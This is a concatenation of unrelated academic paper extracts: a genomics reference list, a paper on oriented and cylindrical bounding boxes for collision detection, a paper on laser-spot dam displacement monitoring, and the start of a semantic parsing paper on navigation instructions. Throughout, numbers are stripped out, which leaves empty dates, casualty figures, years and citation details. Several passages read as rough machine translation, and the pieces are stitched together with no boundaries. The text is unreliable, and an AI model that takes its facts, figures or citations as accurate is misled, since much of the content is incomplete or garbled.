metagnomic sample. bmc bioinformatics :article doi . / - - - . the international human genome sequencing consortium. . initial sequencing and analysis of the human genome. nature : – doi . / . thiel t, pratte bs, zhong j, goodwin l, copeland a, lucas s, han c, pitluck s, land ml, kyrpides nc, woyke t. . complete genome sequence of anabaena variabilis atcc . standards in genomic sciences : – doi . /sigs. . 
venter jc, adams md, myers ew, li pw, mural rj, sutton gg, smith ho, yandell m, evans ca, holt ra, gocayne jd, amanatides p, ballew rm, huson dh, wortman jr, zhang q, kodira cd, zheng xh, chen l, skupski m, subramanian g, thomas pd, zhang j, gabor miklos gl, nelson c, broder s, clark ag, nadeau j, mckusick va, zinder n, levine aj, roberts rj, simon m, slayman c, hunkapiller m, bolanos r, delcher a, dew i, fasulo d, flanigan m, florea l, halpern a, han- nenhalli s, kravitz s, levy s, mobarry c, reinert k, remington k, abu-threideh j, beasley e, biddick k, bonazzi v, brandon r, cargill m, chandramouliswaran i, charlab r, chaturvedi k, deng z, di francesco v, dunn p, eilbeck k, evangelista c, gabrielian ae, gan w, ge w, gong f, gu z, guan p, heiman tj, higgins me, ji rr, ke z, ketchum ka, lai z, lei y, li z, li j, liang y, lin x, lu f, merkulov gv, milshina n, moore hm, naik ak, narayan va, neelam b, nusskern d, rusch db, salzberg s, shao w, shue b, sun j, wang z, wang a, wang x, wang j, wei m, wides r, xiao c, yan c, yao a, ye j, zhan m, zhang w, zhang h, zhao q, zheng l, zhong f, zhong w, zhu s, zhao s, gilbert d, baumhueter s, spier g, carter c, cravchik a, woodage t, ali f, an h, awe a, baldwin d, baden h, barnstead m, barrow i, beeson k, busam d, carver a, center a, cheng ml, curry l, danaher s, davenport l, desilets r, dietz s, dodson k, doup l, ferriera s, garg n, gluecksmann a, hart b, haynes j, haynes c, heiner c, hladun s, hostin d, houck j, howland t, ibegwam c, johnson j, kalush f, kline l, koduru s, love a, mann f, may d, mccawley s, mcintosh t, mcmullen i, moy m, moy l, murphy b, nelson k, pfannkoch c, pratts e, puri v, qureshi h, reardon m, rodriguez r, rogers yh, romblad d, ruhfel b, scott r, sitter c, smallwood m, stewart e, strong r, suh e, thomas r, tint nn, tse s, vech c, wang g, wetter j, williams s, williams m, windsor s, winn-deen e, wolfe k, zaveri j, zaveri k, abril jf, guigo r, campbell mj, sjolander kv, karlak b, kejariwal a, mi h, lazareva b, hatton t, narechania a, et al. . the sequence of the human genome. science : – doi . /science. . venter jc, remington k, heidelberg jf, halpern al, rusch d, eisen ja, wu d, paulsen i, nelson ke, nelson w, fouts de, levy s, knap ah, lomas mw, nealson k, white o, peterson j, hoffman j, parsons r, baden-tillson h, pfannkoch c, rogers yh, smith ho. . environmental genome shotgun sequencing of the sargasso sea. science : – doi . /science. . lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - http://dx.doi.org/ . / http://dx.doi.org/ . /sigs. http://dx.doi.org/ . /science. http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. wood de, salzberg sl. . kraken: ultrafast metagenomic sequence classification us- ing exact alignments. genome biology :article r doi . /gb- - - -r . xia lc, cram ja, chen t, fuhrman ja, fengzhu s. . accurate genome relative abundance estimation based on shotgun metgenomic reads. plos one :e doi . /journal.pone. . lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /gb- - - -r http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. 
international conference on sensor network and computer engineering (icsnce ) an improved algorithm of the collision detection based on obb geng chaoyang school of computer science and engineering xi’an technological university xi’an, , china e-mail: gengbox@ .com gao fenli school of computer science and engineering xi’an technological university xi’an, , china e-mail: @qq.com abstract—collision detection plays a vital role in improving the sense of immersion and realism in virtual environment. the bounding box is the most basic collision detection algorithm, the obb intersect test tightness and can able to significantly reduce the number of bounding volume. and try to occupy less storage space. propose a bounding box of direction cylindrical so it can be improved though surrounded objects more close, then improve the efficiency of collision detection. keywords-collision detection; detection algorithms; bounding box of direction cylindrical i. the basic principle of collision detection collision detection is inevitable problems about robot, animated simulation, virtual reality, the basic task is to determine the two or more objects make contact between each other whether or through real-time and accuracy are two important requirements collision detection. a. detection requirements ) test whether there is a collision ) the position of the collision detection ) detection distance between objects ) prediction of the collision of the next time ii. collision detection algorithm classification and compared in the field of collision detection algorithm variety, there is no unified classification standards. here are two aspects of collision detection algorithm classification: from the point of view of a time domain to points; from the point of view of the spatial domain to points. a. detection algorithm based on time domain the detection algorithm based on the time domain from the point of view of time domain to points, collision detection algorithm can be divided into discrete collision detection algorithm and continuous collision detection algorithm of two. because the algorithm time discrete characteristics, this kind of algorithm is at least the following two questions: ) pierce the phenomenon exists. ) missed a collision. b. based on space domain collision detection algorithm classification based on space domain collision detection algorithm has always been the focus of research, according to the different structure they are divided into two types: space division method and the hierarchical bounding volume method. the space division method is used for the entire sequence level division technology to realize, and the hierarchical bounding volume law is in the scene of each object of constructing the rational hierarchical bounding volume to achieve. the object bounding box test is a collision detection algorithm is widely used in a way. common bounding volume of the bounding sphere, of aabb of obb bounding box. ) based on the method of spherical bounding box of collision detection based on the method of spherical bounding box of collision detection in virtual scene, two irregular objects in motion will be the collisions between, can use the spherical bounding box method to carry on the examination, adopt corresponding measures to avoid a collision. 
as shown in figure , the virtual objects are first picked dynamically; then, according to the actual need, a spherical bounding box is created for each virtual object involved. for two objects, the distance between the two sphere centres is computed and the two sphere radii are obtained. when the test condition is met (the centre distance is not greater than the sum of the radii), the spherical bounding box collision detection algorithm judges that the two objects have collided. if a collision has occurred, a collision response is carried out, with a different response taken according to the current characteristics of the virtual object.

figure . spherical bounding box (flow: pick virtual objects, create spherical bounding boxes, compute centre distance and sphere radii, perform collision detection).

) the axis-aligned bounding box (aabb)
the axis-aligned bounding box aabb is defined as the smallest hexahedron that contains the object and whose faces are parallel to the coordinate axes; it is the earliest bounding volume to be applied. an aabb can be expressed as

r = { (x, y, z) | x_min ≤ x ≤ x_max, y_min ≤ y ≤ y_max, z_min ≤ z ≤ z_max },

where x_min, x_max, y_min, y_max, z_min, z_max are, respectively, the minimum and maximum projections of the aabb on the x, y and z coordinate axes. these six values are determined by computing the minimum and maximum x, y and z coordinates over all vertices of the object, so an aabb is described by only six scalars. as shown in figure , the intersection test between two aabbs is relatively simple: if the projection interval of box a on the x-axis is [a_min, a_max] and that of box b is [b_min, b_max], then a and b do not intersect when a_min > b_max or when b_min > a_max. two aabbs intersect if and only if their projection intervals overlap on all three axes.

figure . aabb bounding box.

the aabb has the advantages of a simple structure, an easy intersection test and high computational efficiency; its drawback is that it does not enclose the object tightly enough.

) the oriented bounding box (obb) and its improvement
the oriented bounding box obb is a box that contains the object to be detected on every side; it was put forward by gottschalk. the biggest difference between the obb and the aabb is the arbitrariness of its direction: the cuboid can be oriented in any direction according to the structural characteristics of the object's shape, so the obb is tighter. the bounding box is a very effective way to accelerate collision detection (a sketch of the elementary sphere and aabb overlap tests is given below).
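to make the two elementary tests above concrete, the following is a minimal python sketch of the sphere and aabb overlap checks; the tuple-based interface and function names are our own illustration and are not taken from the paper.

import math

def spheres_collide(center_a, radius_a, center_b, radius_b):
    # two spheres intersect when the distance between their centres
    # is not greater than the sum of their radii
    return math.dist(center_a, center_b) <= radius_a + radius_b

def aabbs_collide(a_min, a_max, b_min, b_max):
    # a_min/a_max and b_min/b_max are (x, y, z) triples giving the minimum and
    # maximum projections of each box on the coordinate axes; the boxes intersect
    # iff their projection intervals overlap on all three axes
    return all(a_min[i] <= b_max[i] and b_min[i] <= a_max[i] for i in range(3))

# example: unit boxes offset by 0.5 on x overlap; unit spheres 3 apart do not
print(aabbs_collide((0, 0, 0), (1, 1, 1), (0.5, 0, 0), (1.5, 1, 1)))  # True
print(spheres_collide((0, 0, 0), 1.0, (3, 0, 0), 1.0))                # False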
based on the obb bounding box, a direction cylindrical bounding box is proposed here. as shown in figure , the direction cylindrical bounding box is constructed as follows. for the part to be disassembled, take its geometric centre o = (ox, oy, oz) as the starting point, the disassembly direction v = (vx, vy, vz) (a unit vector) as the direction, and the disassembly distance d as the length, and construct a straight line with the parametric equation

x = ox + t·vx,  y = oy + t·vy,  z = oz + t·vz.

figure . the direction cylinder.

for every vertex p of the part, project it onto this line and record its parameter t; traversing all points of the part and taking the minimum and maximum values tmin and tmax gives the interval [tmin, tmax], the projection interval of all the part's points on the line. the axis of the cylinder may then be given by the parametric equation

x = ox + t·vx,  y = oy + t·vy,  z = oz + t·vz   (tmin ≤ t ≤ d + tmax),

which represents the range swept by the part's projection on the line during the disassembly motion and is used as the axis of the direction cylindrical bounding box. next, the radius of the cylindrical bounding box is determined: for each vertex p of the part, form the vector from the centre o to p; since v is a unit vector, the distance from p to the line is u = |v × op|. traversing all vertices of the part and taking the maximum value umax gives the radius r of the cylindrical bounding box. at this point the direction cylindrical bounding box has been built.

to test the part currently being disassembled, its cylinder is first intersected with all the other parts to find the parts with which a collision may occur, and a precise intersection test is then carried out between the disassembled part and those parts. under this premise, the concrete collision detection algorithm for the cylindrical bounding box is as follows:
a) construct the direction cylindrical bounding box of the part currently being disassembled using the method introduced above, with the axis line, radius r and part centre o given by the equations above;
b) traverse the other parts of the whole assembly and take the i-th part ai (i starts at 1 and is incremented each time this step is re-entered);
c) create an empty set li;
d) traverse the vertices of part ai and take the j-th point pij (j starts at 1 and is incremented on each pass);
e) for point pij, compute its distance uj to the axis line and judge whether uj < r; if so, go to step f), otherwise go to step g);
f) add the triangle strips connected to point pij to the set li;
g) judge whether all vertices of part ai have been traversed; if so, continue to step h), otherwise return to step d);
h) traverse the set li and perform a precise intersection test between the triangles of the moving part and the triangle strips in li, projected along the cylinder axis;
i) judge whether all parts of the assembly have been traversed; if so, continue to step j), otherwise return to step b);
j) end of the algorithm.
(a code sketch of the construction used in steps a) and e) is given at the end of this section.)

different types of test volumes have different characteristics. the bounding sphere and the aabb do not fit the object as tightly as the oriented bounding box obb; the obb is essentially the cuboid closest to the object, a cuboid that may be rotated arbitrarily to follow the object. the obb encloses the object more closely than the bounding sphere and the aabb and is consistent with the object's direction, although its construction is more involved; overall, the obb performs better than the aabb and the bounding sphere. the basic idea of the bounding box method is to replace complicated geometry with simple geometry: a rough test is first performed on the objects' bounding boxes, and only when the bounding boxes intersect can the geometry they enclose possibly intersect. this eliminates a large number of geometry pairs that cannot possibly intersect and quickly locates the geometric parts that may intersect.
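as a concrete illustration of the construction just described, the following is a minimal python sketch that builds a direction cylindrical bounding box from a part's vertices and tests whether a point lies within it; the function and variable names are our own, and the sketch assumes the disassembly direction is already a unit vector, as in the text.

import numpy as np

def build_direction_cylinder(vertices, center, direction, d):
    # vertices: (n, 3) array of part vertices; center: geometric centre o
    # direction: unit disassembly vector v; d: disassembly distance
    o = np.asarray(center, dtype=float)
    v = np.asarray(direction, dtype=float)
    rel = np.asarray(vertices, dtype=float) - o
    t = rel @ v                                         # projection parameter on the axis
    radial = np.linalg.norm(np.cross(rel, v), axis=1)   # distance to the axis, |v x op|
    # the axis segment covers the part's projection swept along the disassembly motion
    return {"o": o, "v": v, "t_min": t.min(), "t_max": d + t.max(), "r": radial.max()}

def vertex_near_axis(p, cyl):
    # step e) of the algorithm checks only the radial distance u < r; the axial
    # interval check is added here to make this a full point-in-cylinder test
    rel = np.asarray(p, dtype=float) - cyl["o"]
    t = rel @ cyl["v"]
    u = np.linalg.norm(np.cross(rel, cyl["v"]))
    return u < cyl["r"] and cyl["t_min"] <= t <= cyl["t_max"]

# hypothetical part: a small cloud of vertices disassembled along +x by d = 2
verts = np.array([[0.0, 0.5, 0.0], [1.0, -0.5, 0.2], [0.5, 0.0, -0.4]])
cyl = build_direction_cylinder(verts, center=(0.5, 0.0, 0.0), direction=(1.0, 0.0, 0.0), d=2.0)
print(vertex_near_axis((1.5, 0.1, 0.0), cyl))  # True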
conclusion direction surrounded by box of inherited the cylindrical obb bounding box the advantages of the intersection of the test in its close the gender is good, can be significantly reduced the number of bounding volume, when some similar to the cylinder's geometry object happened between the collision detection, obb is a better choice, for direction surrounded by box of more suitable for cylinder for cylindrical objects geometry. can more closely, more convenient application, so as to enhance the efficiency of collision detection. after the rotary motion, only need to base the rotation of the coordinate system also can. so for the rigid body reference [ ] sankar jayaram etal. vade: a virtual assembly design environment[j]. ieee computer graphics and applications, ( ), on page - . [ ] ritchie j m, dewar r g, simmons j e l. the generation and practical use of plans for manual assembly using immersive virtual reality [j]. proc inst mech engrs part b (s - ), , ( ): - . [ ] deviprasad t, kesavadas t. virtual prototyping of assembly components using process modeling [j]. journal of manufacturing systems (s - ), , ( ): - . [ ] dewar, r.g., carpenter, i.d, ritchie, j.m. simmons, j.e.l , assembly planning in a virtual environment, picmet ' : portland international conference on management and technology, portland, . [ ] jia zhen hong, hui yang, in collision detection problem [j], journal of software, , ( ): - . [ ] yu qin gao, d space collision detection algorithm of research [d] ,huazhong university of science and technology, master's degree thesis, . [ ] fanzhaohui, china root, gaoshuming. based on parallel fast collision detection algorithm [j]. system simulation journal, , ( ): - . [ ] li kangshun, li yuanxiang, shang mingduan, etc.genetic programming in the application of statistical modeling [j]. system simulation journal, ( ). international conference on sensor network and computer engineering (icsnce ) the design and implementation of displacement monitoring system for tailings dam guoshao chen school of computer science and engineering xi’an technological university xi’an, , china e-mail: @qq.com zhichao lian school of computer science and engineering, xi’an technological university, xi’an, , china e-mail: @qq.com abstract—non-coal mining generally produces a large amount of tailings, and tailings usually accumulate in the canyon between two mountains, and the downstream of the tailings is intercepted by the dam. the dam is called a tailings dam. the development of safety monitoring technology for tailings dam is accompanied by the history of dam construction. the safety of tailings dam is not only related to the normal operation of mining industry, but also to the life safety of downstream residents. once the tailings dam break, the loss caused by the dam is inestimable. in this paper, the laser collimation system is used to monitor the displacement of the dam, and the center of light is measured by the center of gravity, and the laser beam is reconstructed by a lens. the method has the advantages of high accuracy and simultaneous detection of horizontal displacement and vertical displacement of tailings dam. it is a new monitoring technology for dam displacement and has good application prospects. keywords-dam displacement; center of gravity method; laser spot i. summary human beings have begun to develop and use mineral resources a long time ago. china has a rich variety of mining industries, and the mining industry is the basis of various industries. minerals can't be % purity. 
during the smelting process, the impurities in ores are separated. because the value of impurities can be very small, they accumulate in tailings. with the improvement of smelting technology, the utilization ratio of minerals is becoming higher and higher, but there are still some tailings. a tailings dam has been formed and the tailings dam is used to prevent the dams from tailings. in our country, thousands of such tailing dams are standing large and small. the collapse of the tailings dam occurred, which caused great loss to the life and property of the country and the people, and caused serious pollution to the natural environment. in september , , a special dam break occurred in linfen, shanxi, which killed people and had a very bad impact on the society. in september , , tin tailing dam of guangdong xinyi qian pai village in zijin mining co. the dam failure occurred, the accident caused people missing, people were killed and injured. because of various reasons, many countries have occurred dam break in history. in december , , the french marce broke down. because the management failed to analyze the dam monitoring data in time, it resulted in a disaster that could be avoided. although the history of damming is accompanied by the history of human civilization, it has a history of thousands of years. however, due to various uncertain factors of the dam body, it is difficult to detect the safety of the dam. early monitoring is simply a simple appearance check, and no scientific monitoring means. by the middle of twentieth century, the dam safety monitoring theory system was basically formed. with the appearance of some monitoring instruments and monitoring methods, vertical line method, triangulation method and precise leveling method were used to measure horizontal displacement and vertical displacement. international conference on sensor network and computer engineering (icsnce ) according to the technical code for safety monitoring of dam (sl - ) promulgated in and the technical code for safety monitoring of concrete dams issued in (dl/t - ), dam safety monitoring projects generally include the following aspects. ) monitoring of working conditions: also called environmental monitoring, mainly including water level, water temperature and freezing and so on. ) deformation monitoring: mainly including the horizontal displacement of the dam and the vertical displacement of the dam. ) water leakage monitoring: mainly including the infiltration line of the dam. ) pressure monitoring: mainly including the temperature of the dam, the earth pressure and so on. ) other monitoring: mainly including earthquake monitoring. ii. system overall design in this paper, the image processing method is used to measure the displacement of the dam, and its structure is shown in figure . figure . system structure the laser and laser receiver are fixed on both sides of the mountain. the lens is mounted on the dam body. the laser uses a helium neon laser, and the laser emitted from the light source is projected to the laser receiver through the lens. the laser will form a spot on the receiver. the laser, lens, and laser receiver are in the same line in the ideal condition. when the dam displacement occurs, it will drive the lens to move. the corresponding image is also moving on the laser receiver. by measuring the displacement of the spot on the detector, we can get the displacement of lens system further. figure . 
monitoring schematic.

figure is a monitoring schematic. l is the laser, m is the lens, o and o' are positions of the centre of m, and y and y' are the corresponding laser spots on the laser receiver. when the lens is at o, the beam from l passes through m and forms an image at point y; when the lens moves to o', the spot moves to y'. the displacement of the lens can therefore be calculated from the displacement of the spot, which is collected by a ccd system placed behind the laser receiver. by similar triangles, the displacement of the spot and the displacement of the lens are related by

Δy = ((l1 + l2) / l1) · Δx,

where l1 is the distance from the laser to the lens, l2 is the distance from the lens to the receiver, Δx is the lateral displacement of the lens and Δy is the resulting displacement of the spot on the receiver. assuming that the lens only moves up and down and that the lengths l1 and l2 are known, the displacement of the dam can be calculated as long as the displacement Δy of the spot is detected accurately. the deformation of the dam body is then obtained by measuring the displacement at each measuring point installed on the dam.

the image captured by the ccd camera would be a perfect dot in the ideal situation. in practice, however, diffraction and various other disturbances deform the spot, so that the measured centre deviates from the ideal centre position. the image collected by the ccd must therefore be filtered before the next processing step.

iii. gravity method
in this paper, the centre of the laser spot is extracted by the centre-of-gravity (centroid) method. when the centre-of-gravity method is used to deal with the spot, the image is first binarized and the spot area is identified. the accuracy of this method is relatively high and its speed is fast, but it is only applicable to symmetric patterns; if the image is asymmetric, large deviations will occur. the basic principle of the gravity method is to replace the geometric centre of the image with its energy centre. letting p_i be the gray value of pixel i at coordinates (x_i, y_i), the centre-of-gravity coordinates (x, y) are

x = Σ_i x_i p_i / Σ_i p_i,   y = Σ_i y_i p_i / Σ_i p_i,   i = 1, ..., n.

in order to improve the reliability of the system, every measuring point must be measured several times and the position of the spot is calculated from the measured data; the ccd is sampled repeatedly and the results are averaged to improve the accuracy (a minimal sketch of this centroid computation is given below).

iv. hardware introduction
the system consists of six parts, as shown in figure (system hardware):
a. laser: the laser has high luminance, a very small divergence angle and good monochromaticity; because of these unique properties it is used as the straight-line reference in this system.
b. lens system: the laser beam is reshaped to improve the beam quality and thus the measurement accuracy; an optical lens is used, and in practical application a fresnel lens is adopted.
c. laser receiver: a translucent scattering screen, similar to ground glass, which makes it convenient for the camera to capture the light spot.
d. camera: the receiver module uses a camera, which in this system is mainly used to capture the laser spot image.
e. processor: an intelligent chip is used to analyze the image and calculate the amount of displacement; its design involves both hardware and software.
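as an illustration of the centre-of-gravity computation in section iii, the following is a minimal python sketch that binarizes a gray-level frame, keeps the pixels belonging to the spot and returns the intensity-weighted centroid, with repeated frames averaged as suggested above; the threshold value and the array-based interface are our own assumptions, not details taken from the paper.

import numpy as np

def spot_centroid(gray, threshold=50):
    # gray: 2-d array of pixel gray values from the ccd camera
    img = np.asarray(gray, dtype=float)
    mask = img > threshold            # binarize to isolate the spot area
    if not mask.any():
        return None                   # no spot found in this frame
    weights = img * mask
    total = weights.sum()
    ys, xs = np.indices(img.shape)
    x_c = (xs * weights).sum() / total   # x = sum(x_i * p_i) / sum(p_i)
    y_c = (ys * weights).sum() / total   # y = sum(y_i * p_i) / sum(p_i)
    return x_c, y_c

def averaged_centroid(frames, threshold=50):
    # sample the ccd repeatedly and average the centroid to improve accuracy
    pts = [spot_centroid(f, threshold) for f in frames]
    pts = [p for p in pts if p is not None]
    return tuple(np.mean(pts, axis=0)) if pts else None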
and the data will be sent to the wireless module. f. zigbee wireless module the system uses the wireless module to transmit the deformable data to the base station, and overcomes the difficulty of long distance wiring, and uses the popular zigbee to implement it. zigbee is a wireless network transmission technology which has been developed in recent years, which is adaptable to short distance, low rate and low power consumption. v. conclusion in this paper, the dam displacement monitoring system is designed in detail, including hardware structure design and image processing algorithm. the system is tested in the tailings dam, the data is accurate. due to the transmission of laser in the air, the visibility of the air is reduced, the brightness of the laser spot is insufficient, so the data cannot be collected sometimes. acknowledgment fund support: shaanxi education department special fund project number: shaanxi education finance[ ] vi. reference [ ] tailings beach length monitoring system research based on digital image processing zhang yulei [ ] tailings dam displacement monitoring system based on laser collimation method design ru naiyu [ ] tailings safety monitoring system based on silverlight zhang cheng [ ] high precision positioning algorithm for laser spot center research chen he; yang zhihao; guo pan; zhang yinchao; chen siying beijing institute of technology journal. [ ] astronomical instruments in image tracking algorithm of the comparative study of wang lili; hu chinese; season hangxin astronomy. transactions of the association for computational linguistics, ( ) – . action editor: jason eisner. submitted / ; published / . c© association for computational linguistics. weakly supervised learning of semantic parsers for mapping instructions to actions yoav artzi and luke zettlemoyer computer science & engineering university of washington seattle, wa {yoav,lsz}@cs.washington.edu abstract the context in which language is used pro- vides a strong signal for learning to recover its meaning. in this paper, we show it can be used within a grounded ccg semantic parsing approach that learns a joint model of mean- ing and context for interpreting and executing natural language instructions, using various types of weak supervision. the joint nature provides crucial benefits by allowing situated cues, such as the set of visible objects, to di- rectly influence learning. it also enables algo- rithms that learn while executing instructions, for example by trying to replicate human ac- tions. experiments on a benchmark naviga- tional dataset demonstrate strong performance under differing forms of supervision, includ- ing correctly executing % more instruction sets relative to the previous state of the art. introduction the context in which natural language is used pro- vides a strong signal to reason about its meaning. however, using such a signal to automatically learn to understand unrestricted natural language remains a challenging, unsolved problem. for example, consider the instructions in figure . correct interpretation requires us to solve many sub- problems, such as resolving all referring expres- sions to specific objects in the environment (includ- ing, “the corner” or “the third intersection”), disam- biguating word sense based on context (e.g., “the chair” could refer to a chair or sofa), and finding executable action sequences that satisfy stated con- straints (such as “twice” or “to face the blue hall”). 
move forward twice to the chair λa.move(a) ∧dir(a,forward) ∧ len(a, ) ∧ to(a,ιx.chair(x)) at the corner turn left to face the blue hall λa.pre(a,ιx.corner(x)) ∧ turn(a) ∧dir(a,left) ∧ post(a,front(you,ιx.blue(x) ∧hall(x))) move to the chair in the third intersection λa.move(a) ∧ to(a,ιx.sofa(x)) ∧ intersect(order(λy.junction(y),frontdist, ),x) figure : a sample navigation instruction set, paired with lambda-calculus meaning representations. we must also understand implicit requests, for ex- ample from the phrase “at the corner,” that describe goals to be achieved without specifying the specific steps. finally, to do all of this robustly without pro- hibitive engineering effort, we need grounded learn- ing approaches that jointly reason about meaning and context to learn directly from their interplay, with as little human intervention as possible. although many of these challenges have been studied separately, as we will review in section , this paper represents, to the best of our knowledge, the first attempt at a comprehensive model that ad- dresses them all. our approach induces a weighted combinatory categorial grammar (ccg), includ- ing both the parameters of the linear model and a ccg lexicon. to model complex instructional lan- guage, we introduce a new semantic modeling ap- proach that can represent a number of key linguistic constructs that are common in spatial and instruc- tional language. to learn from indirect supervision, we define the notion of a validation function, for example that tests the state of the agent after in- terpreting an instruction. we then show how this function can be used to drive online learning. for that purpose, we adapt the loss-sensitive perceptron algorithm (singh-miller & collins, ; artzi & zettlemoyer, ) to use a validation function and coarse-to-fine inference for lexical induction. the joint nature of this approach provides crucial benefits in that it allows situated cues, such as the set of visible objects, to directly influence parsing and learning. it also enables the model to be learned while executing instructions, for example by trying to replicate actions taken by humans. in particular, we show that, given only a small seed lexicon and a task-specific executor, we can induce high quality models for interpreting complex instructions. we evaluate the method on a benchmark naviga- tional instructions dataset (macmahon et al., ; chen & mooney, ). our joint approach suc- cessfully completes % more instruction sets rel- ative to the previous state of the art. we also re- port experiments that vary supervision type, finding that observing the final position of an instruction ex- ecution is nearly as informative as observing the en- tire path. finally, we present improved results on a new version of the macmahon et al. ( ) corpus, which we filtered to include only executable instruc- tions paired with correct traces. technical overview task let s be the set of possible environment states and a be the set of possible actions. given a start state s ∈ s and a natural language instruc- tion x, we aim to generate a sequence of actions ~a = 〈a , . . . ,an〉, with each ai ∈ a, that performs the steps described in x. for example, in the navigation domain (macma- hon et al., ), s is a set of positions on a map. each state s = (x,y,o) is a triple, where x and y are integer grid coordinates and o ∈{ , , , } is an orientation. figure shows an example map with states; the ones we use in our experiments con- tain an average of . 
the space of possible actions a is {left, right, move, null}. actions change the state of the world according to a transition func- tion t : a×s → s. in our navigation example, moving forward can change the x or y coordinates while turning changes the orientation o. model to map instructions to actions, we jointly reason about linguistic meaning and action execu- tion. we use a weighted ccg grammar to rank pos- sible meanings z for each instruction x. section defines how to design such grammars for instruc- tional language. each logical form z is mapped to a sequence of actions ~a with a deterministic executor, as described in section . the final grounded ccg model, detailed in section . , jointly constructs and scores z and ~a, allowing for robust situated reason- ing during semantic interpretation. learning we assume access to a training set con- taining n examples {(xi,si,vi) : i = . . .n}, each containing a natural language sentence xi, a start state si, and a validation function vi. the validation function vi : a → { , } maps an action sequence ~a ∈ a to if it’s correct according to available su- pervision, or otherwise. this training data contains no direct evidence about the logical form zi for each xi, or the grounded ccg analysis used to construct zi. we model all these choices as latent variables. we experiment with two validation functions. the first, vd(~a), has access to an observable demonstra- tion of the execution ~ai, a given ~a is valid iff ~a = ~ai. the second, vsi (~a), only encodes the final state s′i of the execution of x, therefore ~a is valid iff its final state is s′i. since numerous logical forms often ex- ecute identically, both functions provide highly am- biguous supervision. evaluation we evaluate task completion for sin- gle instructions on a test set {(xi,si,s′i) : i = . . .n}, where s′i is the final state of an oracle agent following the execution of xi starting at state si. we will also report accuracies for correctly interpreting instruction sequences ~x, where a single error can cause the entire sequence to fail. finally, we report accuracy on recovering correct logical forms zi on a manually annotated subset of the test set. related work our learning is inspired by the reinforcement learn- ing (rl) approach of branavan et al. ( ), and related methods (vogel & jurafsky, ), but uses latent variable model updates within a semantic parser. branavan et al. ( ) extended their rl ap- proach to model high-level instructions, which cor- respond to implicit actions in our domain. wei et al. ( ) and kollar et al. ( ) used shallow linguis- tic representations for instructions. recently, tellex et al. ( ) used a graphical model semantics rep- resentation to learn from instructions paired with demonstrations. in contrast, we model significantly more complex linguistic phenomena than these ap- proaches, as required for the navigation domain. other research has adopted expressive meaning representations, with differing learning approaches. matuszek et al. ( , ) describe supervised al- gorithms that learn semantic parsers for navigation instructions. chen and mooney ( ), chen ( ) and kim and mooney ( ) present state-of-the- art algorithms for the navigation task, by training a supervised semantic parser from automatically in- duced labels. our work differs in the use of joint learning and inference approaches. supervised approaches for learning semantic parsers have received significant attention, e.g. 
kate and mooney ( ), wong and mooney ( ), muresan ( ) and kwiatkowski et al. ( , ). the algorithms we develop in this pa- per combine ideas from previous supervised ccg learning work (zettlemoyer & collins, , ; kwiatkowski et al., ), as we describe in sec- tion . recently, various alternative forms of su- pervision were introduced. clarke et al. ( ), goldwasser and roth ( ) and liang et al. ( ) describe approaches for learning semantic parsers from sentences paired with responses, krishna- murthy and mitchell ( ) describe using distant supervision, artzi and zettlemoyer ( ) use weak supervision from conversational logs and gold- wasser et al. ( ) present work on unsupervised learning. we discuss various forms of supervision that complement these approaches. there has also been work on learning for semantic analysis tasks from grounded data, including event streams (liang et al., ; chen et al., ) and language paired with visual perception (matuszek et al., ). finally, the topic of executing instructions in non-learning settings has received significant atten- tion (e.g., winograd ( ), di eugenio and white ( ), webber et al. ( ), bugmann et al. ( ), macmahon et al. ( ) and dzifcak et al. ( )). background we use a weighted linear ccg grammar for seman- tic parsing, as briefly reviewed in this section. combinatory categorial grammars (ccgs) ccgs are a linguistically-motivated formalism for modeling a wide range of language phenom- ena (steedman, , ). a ccg is defined by a lexicon and a set of combinators. the lexicon con- tains entries that pair words or phrases with cate- gories. for example, the lexical entry chair ` n : λx.chair(x) for the word “chair” in the parse in fig- ure pairs it with a category that has syntactic type n and meaning λx.chair(x). figure shows how a ccg parse builds a logical form for a complete sen- tence in our example navigation domain. starting from lexical entries, each intermediate parse node, including syntax and semantics, is constructed with one of a small set of ccg combinators (steedman, , ). we use the application, composition and coordination combinators, and three others de- scribed in section . . factored ccg lexicons recently, kwiatkowski et al. ( ) introduced a factored ccg lexicon representation. each lexical item is composed of a lexeme and a template. for example, the entry chair ` n : λx.chair(x) would be constructed by combining the lexeme chair ` [chair], which con- tains a word paired with logical constants, with the template λv.[n : λx.v(x)], that defines the rest of the category by abstracting over logical constants. this approach allows the reuse of common syntactic structures through a small set of templates. section describes how we learn such lexical entries. weighted linear ccgs a weighted linear ccg (clark & curran, ) ranks the space of possible parses under the grammar, and is closely related to several other approaches (lafferty et al., ; collins, ; taskar et al., ). let x be a sentence, y be a ccg parse, and gen(x; Λ) be the set of all possible ccg parses for x given the lexi- con Λ. define φ(x,y) ∈ rd to be a d-dimensional feature–vector representation and θ ∈ rd to be a pa- rameter vector. the optimal parse for sentence x is y∗(x) = arg max y∈gen(x;Λ) θ ·φ(x,y) and the final output logical form z is the λ-calculus expression at the root of y∗(x). section . de- scribes how we efficiently compute an approxima- tion to y∗(x) within the joint interpretation and exe- cution model. 
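The linear ranking y*(x) = argmax over GEN(x; Λ) of θ·φ(x, y) can be sketched directly with sparse feature dictionaries. The candidate parses and feature names below are invented for illustration; this is only the scoring step, not the paper's parser.

```python
from collections import defaultdict

def score(theta, phi):
    """Linear score theta . phi(x, y) over sparse feature dictionaries."""
    return sum(theta.get(f, 0.0) * v for f, v in phi.items())

def best_parse(candidates, theta):
    """argmax over candidate parses, each given as (logical form, feature dict)."""
    return max(candidates, key=lambda c: score(theta, c[1]))

# Hypothetical candidates for "the chair"; all feature names are made up.
theta = defaultdict(float, {"lex:chair->chair": 1.2, "lex:chair->sofa": 0.4})
candidates = [
    ("iota x.chair(x)", {"lex:chair->chair": 1.0, "template:N": 1.0}),
    ("iota x.sofa(x)",  {"lex:chair->sofa": 1.0, "template:N": 1.0}),
]
parse, feats = best_parse(candidates, theta)
print(parse)  # iota x.chair(x)
```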
